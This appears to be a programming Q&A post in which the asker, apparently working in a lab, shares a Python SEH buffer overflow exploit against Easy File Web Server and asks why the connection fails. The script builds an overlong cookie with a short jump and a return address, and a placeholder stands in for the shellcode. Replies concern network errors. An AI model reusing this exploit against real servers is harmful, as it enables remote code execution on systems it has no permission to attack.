# How to avoid this socket.error: [Errno 113] No route to host?

Tags: python, sockets

I am trying to exploit a SEH Buffer Overflow on Easy File Webserver. However, I am getting the following error:

```
root@kali:~/Desktop# python default.py
[+]Sending the Exploit....
Traceback (most recent call last):
  File "default.py", line 42, in <module>
    s.connect((host, port))
  File "/usr/lib/python2.7/socket.py", line 228, in meth
    return getattr(self._sock,name)(*args)
socket.error: [Errno 113] No route to host
```

This is my code:

```
import sys, socket, struct

shellcode ("Ignore the shellcode.")
host = '192.168.40.156'
port = 8080
evil = "\x90" * 4 + shellcode
buffer = "A" * 4059 + "\xEB\x06\x90\x90" + "\x34\x03\x01\x10" + evil + "D" * 578
httpreq = (
"GET /changeuser.ghp HTTP/1.1\r\n"
"User-Agent: Mozilla/4.0\r\n"
"Host:" + host + ":" + str(port) + "\r\n"
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
"Accept-Language: en-us\r\n"
"Accept-Encoding: gzip, deflate\r\n"
"Referer: http://" + host + "/\r\n"
"Cookie: SESSIONID=6771; UserID=" + buffer + "; PassWD=;\r\n"
"Conection: Keep-Alive\r\n\r\n"
)


print "[+]Sending the Exploit...."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(httpreq)
s.close()

print "Done!"
```

How can I solve this error?

- Both machines can ping each other.
- The firewall of the victim machine is off.

**EDIT: Restarted my computer and starting to run the script. I am now getting the following error:**

```
[+]Sending the Exploit....
Traceback (most recent call last):
  File "default.py", line 42, in <module>
    s.connect((host, port))
  File "/usr/lib/python2.7/socket.py", line 228, in meth
    return getattr(self._sock,name)(*args)
socket.error: [Errno 111] Connection refused
```

Comment: It means what it says - the server RESET the connection. Sounds like someone discovered your plans and turned off the vulnerable service.

Comment: This question relates to runtime network stack configuration (routing table correctness), not to software development. The same issues would impact any other tool, including end-user tools such as `ping`, `telnet`, etc; and are thus not on-topic here.

Comment: Did you find out the reason? I've the problem even if the firewall is off.

Comment: See my answer below.